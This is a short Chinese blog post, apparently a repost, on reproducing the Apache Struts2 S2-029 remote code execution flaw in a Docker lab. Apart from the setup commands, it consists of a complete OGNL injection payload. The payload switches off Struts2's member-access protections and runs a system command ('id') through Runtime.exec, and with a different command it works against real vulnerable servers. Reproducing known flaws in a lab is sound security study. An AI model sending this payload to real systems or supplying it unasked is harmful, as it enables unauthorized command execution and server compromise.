Struts2远程代码执行漏洞复现

环境搭建

docker pull medicean/vulapps:s_struts2_s2-029

docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-029

http://yourIP/default.action打开页面

漏洞利用

(%23_memberAccess['allowPrivateAccess']=true,%23_memberAccess['allowProtectedAccess']=true,%23_memberAccess['excludedPackageNamePatterns']=%23_memberAccess['acceptProperties'],%23_memberAccess['excludedClasses']=%23_memberAccess['acceptProperties'],%23_memberAccess['allowPackageProtectedAccess']=true,%23_memberAccess['allowStaticMethodAccess']=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream()))

猜你喜欢

转载自blog.csdn.net/xuandao_ahfengren/article/details/107062754